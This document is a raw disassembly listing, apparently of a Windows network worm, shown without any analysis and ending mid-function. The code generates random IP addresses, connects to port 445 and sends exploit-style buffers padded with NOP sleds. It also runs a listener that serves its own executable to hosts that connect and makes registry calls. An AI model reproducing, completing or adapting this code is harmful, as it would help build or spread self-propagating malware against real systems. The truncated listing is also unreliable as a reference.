dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
dd 2000h, 73622E60h, 73h, 11000h, 300000h, 5 dup(0)
dd 8000h, 61642EC0h, 6174h, 0DE800h, 400000h, 0DE800h
dd 1E0000h, 3 dup(0)
dd 4000h, 64692EC0h, 617461h, 97000h, 500000h, 97000h
dd 2C0000h, 3 dup(0)
dd 6000h, 0C0h, 79h dup(0)
dd 40C03100h, 4244C8Bh, 60441F7h, 74000000h, 24448B0Fh
dd 24548B08h, 0B8028910h, 3
db 0C3h
; =============== S U B R O U T I N E =======================================
sub_41CE01 proc near ; CODE XREF: .data:0041CF39�p
; .data:0041CF67�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_41CE1E: ; CODE XREF: sub_41CE01+44�j
; sub_41CE01+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41CE4D
cmp esi, [esp+1Ch+arg_4]
jz short loc_41CE4D
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41CE1E
call dword ptr [ebx+esi*4+8]
jmp short loc_41CE1E
; ---------------------------------------------------------------------------
loc_41CE4D: ; CODE XREF: sub_41CE01+2A�j
; sub_41CE01+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41CE01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CE5B proc near ; CODE XREF: .data:0041CF2C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_41E599
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41CE5B endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
mov dword ptr ds:loc_40408C, eax
mov dword ptr ds:loc_40408C+4, ebx
test dword ptr [eax+4], 6
jnz loc_41CF60
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
mov dword ptr ds:loc_40408C+4, eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41CEBE: ; CODE XREF: .data:0041CF57�j
cmp esi, 0FFFFFFFFh
jz loc_41CF6F
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41CF4E
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov dword ptr ds:loc_40402D+3, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov dword ptr ds:loc_404032+2, eax
mov eax, [edx+4]
mov dword ptr ds:loc_404038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, loc_40403B+1
mov esi, dword ptr ds:loc_404032+2
rep movsd
lea edi, loc_40403B+1
mov dword ptr ds:loc_404032+2, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41CF4E
js short loc_41CF5C
mov edi, [ebx+8]
push ebx
call sub_41CE5B
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41CE01
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41CF4E: ; CODE XREF: .data:0041CECF�j
; .data:0041CF24�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41CEBE
; ---------------------------------------------------------------------------
loc_41CF5C: ; CODE XREF: .data:0041CF26�j
xor eax, eax
jmp short loc_41CFD1
; ---------------------------------------------------------------------------
loc_41CF60: ; CODE XREF: .data:0041CE9E�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41CE01
add esp, 0Ch
loc_41CF6F: ; CODE XREF: .data:0041CEC1�j
push 0
mov dword ptr ds:loc_40400C+4, 0Bh
push 0Bh
call sub_41E73D
add esp, 8
or eax, eax
jnz short loc_41CFAA
push 0
mov dword ptr ds:loc_40400C+4, 8
push 8
call sub_41E73D
add esp, 8
or eax, eax
jnz short loc_41CFAA
mov eax, 1
jmp short loc_41CFD1
; ---------------------------------------------------------------------------
loc_41CFAA: ; CODE XREF: .data:0041CF87�j
; .data:0041CFA1�j
cmp eax, 0FFFFFFFFh
jz short loc_41CFD9
push eax
push dword ptr ds:loc_40400C+4
call sub_41E73D
add esp, 8
push dword ptr ds:loc_40400C+4
call sub_41E725
add esp, 4
mov eax, 1
loc_41CFD1: ; CODE XREF: .data:0041CF5E�j
; .data:0041CFA8�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41CFD9: ; CODE XREF: .data:0041CFAD�j
cmp dword ptr ds:loc_40402A+2, 0
jnz short loc_41CFE9
mov eax, 1
jmp short loc_41CFD1
; ---------------------------------------------------------------------------
loc_41CFE9: ; CODE XREF: .data:0041CFE0�j
mov eax, dword ptr ds:loc_40402A+2
push 0Bh
jmp eax
; ---------------------------------------------------------------------------
dw 0B858h
dd 1, 0A164D7EBh, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 40401Ch
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp-18h], esp
push eax
fnstcw word ptr [esp]
or word ptr [esp], 300h
fldcw word ptr [esp]
add esp, 4
push 0
push 0
push 404028h
push 404024h
push 404020h
call sub_41E6E9
push dword ptr ds:loc_404023+5
push dword ptr ds:loc_404023+1
push dword ptr ds:loc_40401E+2
mov dword ptr ds:loc_404014, esp
call sub_41E441
add esp, 18h
xor ecx, ecx
mov [ebp-4], ecx
push eax
call sub_41E701
leave
retn
; ---------------------------------------------------------------------------
db 64h, 0A3h, 0
dd 0C3000000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D07D proc near ; CODE XREF: sub_41D118+12�p
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
push 2
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_41E6DD
add esp, 0Ch
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_41D0A0: ; CODE XREF: sub_41D07D+28�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D0A0
mov ebx, eax
mov [ebp+var_2], bl
mov [ebp+var_1], 0
jmp short loc_41D0C8
; ---------------------------------------------------------------------------
loc_41D0B2: ; CODE XREF: sub_41D07D+55�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [edi+edx], al
add [ebp+var_1], 1
loc_41D0C8: ; CODE XREF: sub_41D07D+33�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_41D0B2
movzx eax, [ebp+var_2]
mov byte ptr [edi+eax], 0
mov [ebp+var_3], 0
jmp short loc_41D0F4
; ---------------------------------------------------------------------------
loc_41D0E2: ; CODE XREF: sub_41D07D+88�j
push offset sub_404DE5
push edi
call sub_41E761
add esp, 8
add [ebp+var_3], 1
loc_41D0F4: ; CODE XREF: sub_41D07D+63�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_41D0E2
push [ebp+arg_8]
push edi
call sub_41E761
add esp, 8
pop edi
pop esi
pop ebx
leave
retn
sub_41D07D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D118 proc near ; CODE XREF: sub_41E239+97�p
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push 404DE3h
lea eax, [ebp+var_32]
push eax
push [ebp+arg_0]
call sub_41D07D
add esp, 0Ch
lea eax, [ebp+var_32]
push eax
call sub_41E551
leave
retn
sub_41D118 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D13D proc near ; CODE XREF: .data:0041E1F7�p
; sub_41E239+F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41E6A1
mov edi, eax
or edi, edi
jz short loc_41D16D
xor eax, eax
jmp short loc_41D1A5
; ---------------------------------------------------------------------------
loc_41D16D: ; CODE XREF: sub_41D13D+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_41E6D1
mov edi, eax
push [ebp+var_4]
call sub_41E6AD
or edi, edi
jz short loc_41D195
xor eax, eax
jmp short loc_41D1A5
; ---------------------------------------------------------------------------
loc_41D195: ; CODE XREF: sub_41D13D+52�j
cmp [ebp+var_8], 1
jnz short loc_41D1A2
mov eax, 2
jmp short loc_41D1A5
; ---------------------------------------------------------------------------
loc_41D1A2: ; CODE XREF: sub_41D13D+5C�j
xor eax, eax
inc eax
loc_41D1A5: ; CODE XREF: sub_41D13D+2E�j
; sub_41D13D+56�j ...
pop edi
leave
retn
sub_41D13D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1A8 proc near ; CODE XREF: .data:0041E1D0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41E6B9
mov edi, eax
or edi, edi
jz short loc_41D1CD
xor eax, eax
jmp short loc_41D1F8
; ---------------------------------------------------------------------------
loc_41D1CD: ; CODE XREF: sub_41D1A8+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_41E6C5
mov edi, eax
push [ebp+var_4]
call sub_41E6AD
or edi, edi
jz short loc_41D1F5
xor eax, eax
jmp short loc_41D1F8
; ---------------------------------------------------------------------------
loc_41D1F5: ; CODE XREF: sub_41D1A8+47�j
xor eax, eax
inc eax
loc_41D1F8: ; CODE XREF: sub_41D1A8+23�j
; sub_41D1A8+4B�j
pop edi
leave
retn
sub_41D1A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push ebx
push esi
push edi
xor ebx, ebx
push 0
push 100h
lea eax, [ebp-100h]
push eax
push dword ptr [ebp+8]
call sub_41E3F9
cmp eax, 0FFFFFFFFh
jz loc_41D33F
push 404DDFh
lea eax, [ebp-100h]
push eax
call sub_41E779
add esp, 8
or eax, eax
jz loc_41D301
push 404DDBh
lea edx, [ebp-100h]
push edx
call sub_41E779
add esp, 8
or eax, eax
jz loc_41D301
push 0
push 3Dh
push 404D9Dh
push dword ptr [ebp+8]
call sub_41E405
push dword ptr ds:loc_403000+4
push 404D86h
lea eax, [ebp-200h]
push eax
call sub_41E749
add esp, 0Ch
lea ecx, [ebp-200h]
or eax, 0FFFFFFFFh
loc_41D294: ; CODE XREF: .data:0041D299�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D294
push 0
push eax
lea edx, [ebp-200h]
push edx
push dword ptr [ebp+8]
call sub_41E405
loc_41D2AD: ; CODE XREF: .data:0041D2F3�j
mov eax, dword ptr ds:loc_403000+4
mov edi, eax
sub edi, ebx
cmp edi, 1000h
jb short loc_41D2C3
mov edi, 1000h
loc_41D2C3: ; CODE XREF: .data:0041D2BC�j
or edi, edi
jz short loc_41D2F5
push 0
push edi
mov eax, ebx
add eax, dword ptr ds:loc_403005+3
push eax
push dword ptr [ebp+8]
call sub_41E405
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41D33F
cmp esi, 1000h
jb short loc_41D2F5
add ebx, esi
push 64h
call sub_41E5B1
jmp short loc_41D2AD
; ---------------------------------------------------------------------------
loc_41D2F5: ; CODE XREF: .data:0041D2C5�j
; .data:0041D2E8�j
push 404098h
call sub_41E569
jmp short loc_41D323
; ---------------------------------------------------------------------------
loc_41D301: ; CODE XREF: .data:0041D23E�j
; .data:0041D25A�j
push 0
push 15h
push offset sub_404D70
push dword ptr [ebp+8]
call sub_41E405
push 0
push 0Dh
push offset sub_40409C
push dword ptr [ebp+8]
call sub_41E405
loc_41D323: ; CODE XREF: .data:0041D2FF�j
push 7D0h
call sub_41E5B1
push 2
push dword ptr [ebp+8]
call sub_41E411
push dword ptr [ebp+8]
call sub_41E399
loc_41D33F: ; CODE XREF: .data:0041D222�j
; .data:0041D2E0�j
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 0
push 404098h
call sub_41E55D
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset sub_403010
call sub_41E581
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41D385
push 1
call sub_41E4F1
loc_41D385: ; CODE XREF: .data:0041D37C�j
push 0
push ebx
call sub_41E515
mov dword ptr ds:loc_403000+4, eax
push eax
push 0
call sub_41E575
mov dword ptr ds:loc_403005+3, eax
push 0
lea eax, [ebp-30h]
push eax
push dword ptr ds:loc_403000+4
push dword ptr ds:loc_403005+3
push ebx
call sub_41E58D
push ebx
call sub_41E52D
push 0
push 1
push 2
call sub_41E41D
mov esi, eax
push 10h
lea eax, [ebp-24h]
push eax
call sub_41E5A5
mov word ptr [ebp-24h], 2
and dword ptr [ebp-20h], 0
mov word ptr [ebp-26h], 0
loc_41D3E5: ; CODE XREF: .data:0041D425�j
movzx eax, word ptr [ebp-26h]
add eax, 50h
mov word ptr ds:loc_404092+2, ax
movzx eax, word ptr ds:loc_404092+2
push eax
call sub_41E3C9
mov edx, eax
mov [ebp-22h], dx
push 10h
lea eax, [ebp-24h]
push eax
push esi
call sub_41E38D
mov [ebp-2Ch], eax
inc word ptr [ebp-26h]
or eax, eax
jz short loc_41D427
movzx eax, word ptr [ebp-26h]
cmp eax, 0FDE8h
jl short loc_41D3E5
loc_41D427: ; CODE XREF: .data:0041D41A�j
push 64h
push esi
call sub_41E3ED
mov dword ptr [ebp-4], 10h
loc_41D436: ; CODE XREF: .data:0041D461�j
lea eax, [ebp-4]
push eax
lea eax, [ebp-14h]
push eax
push esi
call sub_41E381
mov edi, eax
lea eax, [ebp-34h]
push eax
push 0
push edi
push 40141Ah
push 0
push 0
call sub_41E5D5
push eax
call sub_41E52D
jmp short loc_41D436
; ---------------------------------------------------------------------------
db 5Fh
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D468 proc near ; CODE XREF: .data:0041DC9B�p
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
lea edi, [ebp+var_13]
lea esi, loc_4040A7+3
mov ecx, 4
rep movsd
lea edi, [ebp+var_18]
lea esi, loc_4040B2+8
mov ecx, 5
rep movsb
loc_41D491: ; CODE XREF: sub_41D468+51�j
; sub_41D468+74�j
call sub_41E731
mov ecx, 0DDh
cdq
idiv ecx
lea edi, [edx+3]
mov ebx, edi
mov [ebp+var_3], bl
mov [ebp+var_2], 0
jmp short loc_41D4E2
; ---------------------------------------------------------------------------
loc_41D4AE: ; CODE XREF: sub_41D468+81�j
mov al, [ebp+var_3]
movzx edx, [ebp+var_2]
cmp al, [ebp+edx+var_13]
jz short loc_41D491
movzx eax, [ebp+var_2]
cmp eax, 5
jnb short loc_41D4DE
movzx eax, [ebp+var_3]
movzx edx, [ebp+var_2]
movzx ecx, [ebp+edx+var_13]
cmp eax, ecx
jb short loc_41D4DE
movzx edx, [ebp+edx+var_18]
cmp eax, edx
jbe short loc_41D491
loc_41D4DE: ; CODE XREF: sub_41D468+5A�j
; sub_41D468+6B�j
inc [ebp+var_2]
loc_41D4E2: ; CODE XREF: sub_41D468+44�j
movzx eax, [ebp+var_2]
cmp eax, 10h
jb short loc_41D4AE
loc_41D4EB: ; CODE XREF: sub_41D468+AC�j
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_19], bl
movzx eax, [ebp+var_3]
cmp eax, 0C0h
jnz short loc_41D516
movzx eax, [ebp+var_19]
cmp eax, 0A8h
jz short loc_41D4EB
loc_41D516: ; CODE XREF: sub_41D468+A1�j
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1A], bl
call sub_41E731
mov ecx, 0FDh
cdq
idiv ecx
lea edi, [edx+1]
mov ebx, edi
mov [ebp+var_1B], bl
movzx eax, [ebp+var_1B]
push eax
movzx eax, [ebp+var_1A]
push eax
movzx eax, [ebp+var_19]
push eax
movzx eax, [ebp+var_3]
push eax
push 404D64h
push [ebp+arg_0]
call sub_41E749
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_41D468 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D569 proc near ; CODE XREF: .data:0041DEA0�p
var_89F4 = dword ptr -89F4h
var_89F0 = dword ptr -89F0h
var_89EC = dword ptr -89ECh
var_89E8 = dword ptr -89E8h
var_89E3 = byte ptr -89E3h
var_89E2 = word ptr -89E2h
var_89E0 = byte ptr -89E0h
var_89D8 = byte ptr -89D8h
var_8970 = byte ptr -8970h
var_6900 = byte ptr -6900h
var_68E2 = byte ptr -68E2h
var_6842 = byte ptr -6842h
var_6136 = dword ptr -6136h
var_6126 = byte ptr -6126h
var_6112 = byte ptr -6112h
var_60A2 = byte ptr -60A2h
var_55DE = byte ptr -55DEh
var_403A = byte ptr -403Ah
var_4039 = byte ptr -4039h
var_3FBD = byte ptr -3FBDh
var_37ED = byte ptr -37EDh
var_3342 = byte ptr -3342h
var_3058 = dword ptr -3058h
var_3054 = dword ptr -3054h
var_3050 = dword ptr -3050h
var_304C = word ptr -304Ch
var_304A = word ptr -304Ah
var_3048 = dword ptr -3048h
var_303C = byte ptr -303Ch
var_3039 = byte ptr -3039h
var_300F = byte ptr -300Fh
var_300D = byte ptr -300Dh
var_300C = byte ptr -300Ch
var_2FC7 = byte ptr -2FC7h
var_2F83 = byte ptr -2F83h
var_2987 = byte ptr -2987h
var_21A3 = byte ptr -21A3h
var_2193 = byte ptr -2193h
var_1E6F = byte ptr -1E6Fh
var_1E6B = byte ptr -1E6Bh
var_1E5F = byte ptr -1E5Fh
var_1BDA = byte ptr -1BDAh
var_1BD9 = byte ptr -1BD9h
var_B46 = byte ptr -0B46h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 89F4h
call sub_41E4A5
push ebx
push esi
push edi
mov [ebp+var_3054], 1
mov [ebp+var_89F0], 1
lea edi, [ebp+var_89E0]
lea esi, loc_4049EF+1
movsd
movsd
and [ebp+var_89F4], 0
mov [ebp+var_89E2], 1BDh
push 0
push 1
push 2
call sub_41E41D
mov [ebp+var_54], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBBF
mov eax, [ebp+arg_0]
mov [ebp+var_89EC], eax
push eax
call sub_41E3E1
push 1Dh
push eax
lea edi, [ebp+var_6900]
push edi
call sub_41E5BD
lea eax, [ebp+var_6900]
push eax
push 404D5Ah
lea eax, [ebp+var_7C]
push eax
call sub_41E749
add esp, 0Ch
xor ebx, ebx
loc_41D5FA: ; CODE XREF: sub_41D569+A2�j
mov dl, [ebp+ebx+var_7C]
mov [ebp+ebx*2+var_50], dl
mov [ebp+ebx*2+var_4F], 0
inc ebx
cmp ebx, 28h
jl short loc_41D5FA
push 60h
push 404525h
lea eax, [ebp+var_303C]
push eax
call sub_41E70D
lea eax, [ebp+var_7C]
push eax
call sub_41E5C9
mov edi, eax
shl edi, 1
push edi
lea edi, [ebp+var_50]
push edi
lea edi, [ebp+var_300C]
push edi
call sub_41E70D
lea eax, [ebp+var_7C]
push eax
call sub_41E5C9
push 9
push offset sub_40457C
mov edi, eax
shl edi, 1
lea edi, [ebp+edi+var_300D]
push edi
call sub_41E70D
lea eax, [ebp+var_7C]
push eax
call sub_41E5C9
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 34h
mov edx, edi
mov [ebp+var_403A], dl
push 1
lea eax, [ebp+var_403A]
push eax
lea eax, [ebp+var_3039]
push eax
call sub_41E70D
lea eax, [ebp+var_7C]
push eax
call sub_41E5C9
mov edx, eax
movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_41E70D
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_41E719
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_41E5A5
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_41E3C9
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_41E3A5
cmp eax, 0FFFFFFFFh
jnz short loc_41D73C
mov [ebp+var_3054], 2
jmp loc_41DBB7
; ---------------------------------------------------------------------------
loc_41D73C: ; CODE XREF: sub_41D569+1C2�j
push 64h
call sub_41E5B1
push 0
push 89h
push offset sub_404313
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_41D816
cmp eax, 46h
jge short loc_41D81B
loc_41D816: ; CODE XREF: sub_41D569+2A6�j
jmp loc_41DBAD
; ---------------------------------------------------------------------------
loc_41D81B: ; CODE XREF: sub_41D569+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_41D92F
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_41E719
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_41E70D
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_41E70D
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_41E70D
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_41E70D
push [ebp+var_3058]
call sub_41E5C9
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_41E70D
add esp, 48h
xor ebx, ebx
loc_41D8D7: ; CODE XREF: sub_41D569+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_41D8D7
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_41E719
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_41E719
add esp, 18h
jmp short loc_41D991
; ---------------------------------------------------------------------------
loc_41D92F: ; CODE XREF: sub_41D569+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_41E719
push [ebp+var_3058]
call sub_41E5C9
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_41E70D
lea eax, [ebp+var_89E0]
push eax
call sub_41E5C9
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_41E70D
add esp, 24h
mov eax, dword ptr ds:loc_404935+3
mov [ebp+var_6136], eax
loc_41D991: ; CODE XREF: sub_41D569+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
push 0
push 68h
push 404586h
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
push 0
push 0A0h
push 4045EFh
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
cmp [ebp+var_3050], 0
jz loc_41DB39
push 68h
push offset sub_40479E
lea eax, [ebp+var_89D8]
push eax
call sub_41E70D
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_41E70D
push 70h
push 404807h
lea eax, [ebp+var_6112]
push eax
call sub_41E70D
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_41E70D
push 84h
push offset sub_404878
lea eax, [ebp+var_55DE]
push eax
call sub_41E70D
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_41E5B1
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_41E3F9
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_41DBAD
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_41E405
cmp eax, 0FFFFFFFFh
jnz short loc_41DB9F
jmp short loc_41DB9F
; ---------------------------------------------------------------------------
loc_41DB39: ; CODE XREF: sub_41D569+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_41E70D
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_41E70D
push 90h
push 40470Dh
lea eax, [ebp+var_37ED]
push eax
call sub_41E70D
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
